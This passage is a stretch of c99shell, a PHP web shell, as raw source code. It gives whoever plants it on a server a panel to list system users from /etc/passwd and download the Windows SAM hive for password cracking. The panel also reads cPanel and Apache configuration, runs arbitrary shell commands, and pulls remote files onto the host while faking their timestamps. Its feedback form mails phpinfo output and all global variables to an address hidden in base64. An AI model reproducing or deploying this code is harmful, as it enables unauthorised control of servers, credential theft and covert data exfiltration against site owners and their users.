1486    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
1487    $i = $nixpwd_s; 
1488    while ($i < $nixpwd_e) 
1489    { 
1490     $uid = posix_getpwuid($i); 
1491     if ($uid) 
1492     { 
1493      $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
1494      echo join(":",$uid)."<br>"; 
1495     } 
1496     $i++; 
1497    } 
1498   } 
1499   else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
1500 } 
1501 else 
1502 { 
1503   $v = $_SERVER["WINDIR"]."\repair\sam"; 
1504   if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
1505   else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} 
1506 } 
1507 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
1508 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
1509 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
1510 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
1511 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
1512 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
1513 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
1514 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
1515 displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
1516 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
1517 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
1518 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
1519 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
1520 displaysecinfo("RAM",myshellexec("free -m")); 
1521 displaysecinfo("HDD space",myshellexec("df -h")); 
1522 displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
1523 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
1524 displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
1525 displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
1526 displaysecinfo("Is links installed?",myshellexec("which links")); 
1527 displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
1528 displaysecinfo("Is GET installed?",myshellexec("which GET")); 
1529 displaysecinfo("Is perl installed?",myshellexec("which perl")); 
1530 displaysecinfo("Where is apache",myshellexec("whereis apache")); 
1531 displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
1532 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
1533 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
1534 displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
1535 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
1536 } 
1537 if ($act == "mkfile") 
1538 { 
1539 if ($mkfile != $d) 
1540 { 
1541   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
1542   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
1543   else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
1544 } 
1545 else {$act = $dspact = "ls";} 
1546 } 
1547 if ($act == "encoder") 
1548 { 
1549 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
1550 foreach(array("md5","crypt","sha1","crc32") as $v) 
1551 { 
1552   echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
1553 } 
1554 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
1555 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
1556 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
1557 echo "<center>base64_decode - "; 
1558 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
1559 else 
1560 { 
1561   $debase64 = base64_decode($encoder_input); 
1562   $debase64 = str_replace("&#92;&#48;","[0]",$debase64); 
1563   $a = explode("\r\n",$debase64); 
1564   $rows = count($a); 
1565   $debase64 = htmlspecialchars($debase64); 
1566   if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
1567   else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
1568   echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
1569 } 
1570 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
1571 $c = strlen($encoder_input); 
1572 for($i=0;$i<$c;$i++) 
1573 { 
1574   $hex = dechex(ord($encoder_input[$i])); 
1575   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
1576   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
1577 } 
1578 echo "\" readonly><br></center></form>"; 
1579 } 
1580 if ($act == "fsbuff") 
1581 { 
1582 $arr_copy = $sess_data["copy"]; 
1583 $arr_cut = $sess_data["cut"]; 
1584 $arr = array_merge($arr_copy,$arr_cut); 
1585 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
1586 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
1587 } 
1588 if ($act == "selfremove") 
1589 { 
1590 if (($submit == $rndcode) and ($submit != "")) 
1591 { 
1592   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
1593   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
1594 } 
1595 else 
1596 { 
1597   if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
1598   $rnd = rand(0,9).rand(0,9).rand(0,9); 
1599   echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
1600 } 
1601 } 
1602 if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
1603 if ($act == "feedback") 
1604 { 
1605 $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
1606 if (!empty($submit)) 
1607 { 
1608   $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
1609   $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
1610   if (!empty($fdbk_ref)) 
1611   { 
1612    $tmp = @ob_get_contents(); 
1613    ob_clean(); 
1614    phpinfo(); 
1615    $phpinfo = base64_encode(ob_get_contents()); 
1616    ob_clean(); 
1617    echo $tmp; 
1618    $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
1619   } 
1620   mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
1621   echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
1622 } 
1623 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
1624 } 
1625 if ($act == "search") 
1626 { 
1627 echo "<b>Search in file-system:</b><br>"; 
1628 if (empty($search_in)) {$search_in = $d;} 
1629 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
1630 if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
1631 if (!empty($submit)) 
1632 { 
1633   $found = array(); 
1634   $found_d = 0; 
1635   $found_f = 0; 
1636   $search_i_f = 0; 
1637   $search_i_d = 0; 
1638   $a = array 
1639   ( 
1640    "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
1641    "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
1642    "text_wwo"=>$search_text_wwo, 
1643    "text_cs"=>$search_text_cs, 
1644    "text_not"=>$search_text_not 
1645   ); 
1646   $searchtime = getmicrotime(); 
1647   $in = array_unique(explode(";",$search_in)); 
1648   foreach($in as $v) {c99fsearch($v);} 
1649   $searchtime = round(getmicrotime()-$searchtime,4); 
1650   if (count($found) == 0) {echo "<b>No files found!</b>";} 
1651   else 
1652   { 
1653    $ls_arr = $found; 
1654    $disp_fullpath = TRUE; 
1655    $act = "ls"; 
1656   } 
1657 } 
1658 echo "<form method=POST> 
1659 <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
1660 <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
1661 <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
1662 <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
1663 <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
1664 &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
1665 &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
1666 &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
1667 <br><br><input type=submit name=submit value=\"Search\"></form>"; 
1668 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
1669 } 
1670 if ($act == "chmod") 
1671 { 
1672 $mode = fileperms($d.$f); 
1673 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
1674 else 
1675 { 
1676   $form = TRUE; 
1677   if ($chmod_submit) 
1678   { 
1679    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
1680    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
1681    else {$err = "Can't chmod to ".$octet.".";} 
1682   } 
1683   if ($form) 
1684   { 
1685    $perms = parse_perms($mode); 
1686    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
1687   } 
1688 } 
1689 } 
1690 if ($act == "upload") 
1691 { 
1692 $uploadmess = ""; 
1693 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
1694 if (empty($uploadpath)) {$uploadpath = $d;} 
1695 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
1696 if (!empty($submit)) 
1697 { 
1698   global $HTTP_POST_FILES; 
1699   $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
1700   if (!empty($uploadfile["tmp_name"])) 
1701   { 
1702    if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
1703    else {$destin = $userfilename;} 
1704    if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
1705   } 
1706   elseif (!empty($uploadurl)) 
1707   { 
1708    if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
1709    else 
1710    { 
1711     $destin = explode("/",$destin); 
1712     $destin = $destin[count($destin)-1]; 
1713     if (empty($destin)) 
1714     { 
1715      $i = 0; 
1716      $b = ""; 
1717      while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
1718    } 
1719    if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
1720    else 
1721    { 
1722     $st = getmicrotime(); 
1723     $content = @file_get_contents($uploadurl); 
1724     $dt = round(getmicrotime()-$st,4); 
1725     if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
1726     else 
1727     { 
1728      if ($filestealth) {$stat = stat($uploadpath.$destin);} 
1729      $fp = fopen($uploadpath.$destin,"w"); 
1730      if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} 
1731      else 
1732      { 
1733       fwrite($fp,$content,strlen($content)); 
1734       fclose($fp); 
1735       if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} 
1736      } 
1737     } 
1738    } 
1739   } 
1740 } 
1741 if ($miniform) 
1742 { 
1743   echo "<b>".$uploadmess."</b>"; 
1744   $act = "ls"; 
1745 } 
1746 else 
1747 { 
1748   echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> 
1749 Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> 
1750 Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> 
1751 Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> 
1752 File-name (auto-fill): <input name=uploadfilename size=25><br><br> 
1753 <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> 
1754 <input type=submit name=submit value=\"Upload\"> 
1755 </form>"; 
1756 } 
1757 } 
1758 if ($act == "delete") 
1759 { 
1760 $delerr = ""; 
1761 foreach ($actbox as $v) 
1762 { 
1763   $result = FALSE; 
1764   $result = fs_rmobj($v); 
1765   if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} 
1766 } 
1767 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} 
1768 $act = "ls"; 
1769 } 
1770 if (!$usefsbuff) 
1771 { 
1772 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} 
1773 } 
1774 else 
1775 { 
1776 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } 
1777 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} 
1778 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} 
1779 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} 
1780 elseif ($actpastebuff) 
1781 { 
1782   $psterr = ""; 
1783   foreach($sess_data["copy"] as $k=>$v) 
1784   { 
1785    $to = $d.basename($v); 
1786    if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
1787    if ($copy_unset) {unset($sess_data["copy"][$k]);} 
1788   } 
1789   foreach($sess_data["cut"] as $k=>$v) 
1790   { 
1791    $to = $d.basename($v); 
1792    if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
1793    unset($sess_data["cut"][$k]); 
1794   } 
1795   c99_sess_put($sess_data); 
1796   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
1797   $act = "ls"; 
1798 } 
1799 elseif ($actarcbuff) 
1800 { 
1801   $arcerr = ""; 
1802   if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} 
1803   else {$ext = ".tar.gz";} 
1804   if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} 
1805   $cmdline .= " ".$actarcbuff_path; 
1806   $objects = array_merge($sess_data["copy"],$sess_data["cut"]); 
1807   foreach($objects as $v) 
1808   { 
1809    $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); 
1810    if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
1811    if (is_dir($v)) 
1812    { 
1813     if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
1814     $v .= "*"; 
1815    } 
1816    $cmdline .= " ".$v; 
1817   } 
1818   $tmp = realpath("."); 
1819   chdir($d); 
1820   $ret = myshellexec($cmdline); 
1821   chdir($tmp); 
1822   if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
1823   $ret = str_replace("\r\n","\n",$ret); 
1824   $ret = explode("\n",$ret); 
1825   if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
1826   foreach($sess_data["cut"] as $k=>$v) 
1827   { 
1828    if (in_array($v,$ret)) {fs_rmobj($v);} 
1829    unset($sess_data["cut"][$k]); 
1830   } 
1831   c99_sess_put($sess_data); 
1832   if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
1833   $act = "ls"; 
1834 } 
1835 elseif ($actpastebuff) 
1836 { 
1837   $psterr = ""; 
1838   foreach($sess_data["copy"] as $k=>$v) 
1839   { 
1840    $to = $d.basename($v); 
1841    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
1842    if ($copy_unset) {unset($sess_data["copy"][$k]);} 
1843   } 
1844   foreach($sess_data["cut"] as $k=>$v) 
1845   { 
1846    $to = $d.basename($v); 
1847    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
1848    unset($sess_data["cut"][$k]); 
1849   } 
1850   c99_sess_put($sess_data); 
1851   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
1852   $act = "ls"; 
1853 } 
1854 } 
1855 if ($act == "cmd") 
1856 { 
1857 if (trim($cmd) == "ps -aux") {$act = "processes";} 
1858 elseif (trim($cmd) == "tasklist") {$act = "processes";} 
1859 else 
1860 { 
1861 @chdir($chdir); 
1862 if (!empty($submit)) 
1863 { 
1864   echo "<b>Result of execution this command</b>:<br>"; 
1865   $olddir = realpath("."); 
1866   @chdir($d); 
1867   $ret = myshellexec($cmd); 
1868   $ret = convert_cyr_string($ret,"d","w"); 
1869   if ($cmd_txt) 
1870   { 
1871    $rows = count(explode("\r\n",$ret))+1; 
1872    if ($rows < 10) {$rows = 10;} 
1873    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
1874   } 
1875   else {echo $ret."<br>";} 
1876   @chdir($olddir); 
1877 } 
1878 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
1879 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
1880 } 
1881 } 
1882 if ($act == "ls") 
1883 { 
1884 if (count($ls_arr) > 0) {$list = $ls_arr;} 
1885 else 
1886 { 
1887   $list = array(); 
1888   if ($h = @opendir($d)) 
1889   { 
1890    while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
1891    closedir($h); 
1892   } 
1893   else {} 
1894 } 
1895 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
1896 else 
1897 { 
1898   //Building array 
1899   $objects = array(); 
1900   $vd = "f"; //Viewing mode 
1901   if ($vd == "f") 
1902   { 
1903    $objects["head"] = array(); 
1904    $objects["folders"] = array(); 
1905    $objects["links"] = array(); 
1906    $objects["files"] = array(); 
1907    foreach ($list as $v) 
1908    { 
1909     $o = basename($v); 
1910     $row = array(); 
1911     if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
1912     elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
1913     elseif (is_dir($v)) 
1914     { 
1915      if (is_link($v)) {$type = "LINK";} 
1916      else {$type = "DIR";} 
1917      $row[] = $v; 
1918      $row[] = $type; 
1919     } 
1920     elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
1921     $row[] = filemtime($v); 
1922     if (!$win) 
1923     { 
1924      $ow = posix_getpwuid(fileowner($v)); 
1925      $gr = posix_getgrgid(filegroup($v)); 
1926      $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
1927     } 
1928     $row[] = fileperms($v); 
1929     if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
1930     elseif (is_link($v)) {$objects["links"][] = $row;} 
1931     elseif (is_dir($v)) {$objects["folders"][] = $row;} 
1932     elseif (is_file($v)) {$objects["files"][] = $row;} 
1933     $i++; 
1934    } 
1935    $row = array(); 
1936    $row[] = "<b>Name</b>"; 
1937    $row[] = "<b>Size</b>"; 
1938    $row[] = "<b>Modify</b>"; 
1939    if (!$win) 
1940   {$row[] = "<b>Owner/Group</b>";} 
1941    $row[] = "<b>Perms</b>"; 
1942    $row[] = "<b>Action</b>"; 
1943    $parsesort = parsesort($sort); 
1944    $sort = $parsesort[0].$parsesort[1]; 
1945    $k = $parsesort[0]; 
1946    if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
1947    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
1948    $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
1949    $row[$k] .= $y; 
1950    for($i=0;$i<count($row)-1;$i++) 
1951    { 
1952     if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
1953    } 
1954    $v = $parsesort[0]; 
1955    usort($objects["folders"], "tabsort"); 
1956    usort($objects["links"], "tabsort"); 
1957    usort($objects["files"], "tabsort"); 
1958    if ($parsesort[1] == "d") 
1959    { 
1960     $objects["folders"] = array_reverse($objects["folders"]); 
1961     $objects["files"] = array_reverse($objects["files"]); 
1962    } 
1963    $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
1964    $tab = array(); 
1965    $tab["cols"] = array($row); 
1966    $tab["head"] = array(); 
1967    $tab["folders"] = array(); 
1968    $tab["links"] = array(); 
1969    $tab["files"] = array(); 
1970    $i = 0; 
1971    foreach ($objects as $a) 
1972    { 
1973     $v = $a[0]; 
1974     $o = basename($v); 
1975     $dir = dirname($v); 
1976     if ($disp_fullpath) {$disppath = $v;} 
1977     else {$disppath = $o;} 
1978     $disppath = str2mini($disppath,60); 
1979     if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
1980     elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
1981     foreach ($regxp_highlight as $r) 
1982     { 
1983      if (ereg($r[0],$o)) 
1984      { 
1985       if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
1986       else 
1987       { 
